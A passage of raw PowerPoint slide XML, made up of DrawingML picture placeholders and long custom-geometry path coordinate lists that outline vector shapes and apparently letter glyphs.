                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27ECE233-7404-AEE1-C472-3F74AEEBA5B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1543" y="3608044"/>
              <a:ext cx="198359" cy="149700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E1102DA9-9827-8528-7845-67A7E4AFE52F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7563215" y="3249669"/>
              <a:ext cx="229235" cy="240665"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="229234" h="240664">
                  <a:moveTo>
                    <a:pt x="158990" y="3024"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171104" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186246" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198359" y="16633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204416" y="19657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208959" y="22681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215016" y="25706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219558" y="30242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222587" y="34779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225615" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227129" y="45363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228643" y="49900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228643" y="55948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227129" y="63509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219558" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211987" y="114921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202902" y="142140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196845" y="155749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190788" y="169358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184732" y="182967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177161" y="193552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169590" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162019" y="214722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152934" y="223795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146877" y="226819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143848" y="231356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137792" y="232868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131735" y="235892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127192" y="237404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121135" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116593" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112050" y="240428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102965" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93880" y="235892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84795" y="232868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75709" y="229843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="225307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51482" y="219259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45425" y="216234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39369" y="213210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34826" y="210186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30283" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25741" y="201113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21198" y="196577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="192040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13627" y="185992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10599" y="179943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7570" y="173895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="167846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3028" y="161798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="154237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="148188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="110385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="98288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7570" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13627" y="77118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="66533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24227" y="57460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31798" y="46876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39369" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48454" y="31754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57539" y="24194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68138" y="18145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78738" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89337" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99937" y="3024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112050" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124164" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136277" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146877" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158990" y="3024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8" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726AB5DE-E404-4279-7123-BE58FCC9A64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14697" y="3107528"/>
              <a:ext cx="139306" cy="193552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C5D62E-4540-C4C9-FC7D-6F2D339D8DE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55643" y="3097749"/>
              <a:ext cx="278612" cy="400049"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5DC7DA4D-3095-82DF-373C-5E53BC4AFE3F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7396665" y="4099622"/>
              <a:ext cx="713105" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="23306" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="54620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="54620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23306" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81034" y="54620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57727" y="54620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57727" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="54620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81034" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57727" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57727" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="37144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81034" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168634" y="39319"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135145" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139676" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145813" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147357" y="45516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147357" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140916" y="50007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134718" y="50576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100866" y="69921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100927" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103060" y="86237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111997" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112291" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117223" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126428" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128968" y="96011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131914" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129903" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127302" y="80487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126204" y="79898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125270" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124294" y="78272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123685" y="77419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123197" y="75651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123075" y="70957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123664" y="69230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168634" y="39319"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168896" y="87213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147235" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="87213"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168896" y="62443"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147235" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147235" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145528" y="78049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143557" y="79227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138757" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138463" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136852" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168896" y="62443"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="133702" y="24343"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128480" y="24343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123278" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112875" y="26415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109116" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106820" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106820" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108811" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110599" y="43484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113525" y="42509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121449" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121234" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125554" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168634" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166132" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160605" y="30073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155825" y="27566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149745" y="25775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142701" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143537" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133702" y="24343"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="230952" y="24404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221138" y="24404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216139" y="25054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186493" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186593" y="67177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215590" y="95544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221036" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231500" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235646" y="95768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243123" y="93878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246383" y="92699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="90972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221706" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217484" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217270" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210734" y="72156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209129" y="67177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209129" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210693" y="49255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216952" y="41838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221442" y="39989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="39989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="29850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="28244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243103" y="26923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235239" y="24891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230952" y="24404"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250154" y="72339"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="247065" y="72339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246171" y="73192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245216" y="74066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230363" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="72339"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250154" y="39989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229875" y="39989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232171" y="40294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236133" y="41452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247065" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="39989"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="288700" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266775" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266775" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="72054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294593" y="64800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319067" y="64800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313334" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="319067" y="64800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="294593" y="64800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313693" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339113" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319067" y="64800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="337366" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="312169" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313334" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312880" y="55656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337366" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="386397" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="350268" y="45625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347688" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348370" y="68788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372108" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372288" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380376" y="95677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390034" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395337" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400173" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408911" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413564" y="92577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385117" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379610" y="79471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372132" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370100" y="69738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369775" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419782" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419782" y="56733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419500" y="52752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419418" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369714" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370023" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370039" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371543" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374266" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376893" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380423" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415338" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415058" y="37219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411390" y="32552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406696" y="28883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400966" y="26261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394580" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395515" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386397" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="418502" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="416063" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413564" y="74960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410150" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401494" y="80060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397024" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="415338" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="389160" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392513" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394646" y="41269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396800" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397839" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397918" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398040" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419418" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419256" y="49311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417865" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417791" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417681" y="42806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415338" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="459588" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="437683" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437683" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="48788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462331" y="47812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464891" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469646" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487080" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="480133" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482711" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484215" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485244" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487080" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477777" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475661" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468569" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464383" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="590405" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="546312" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
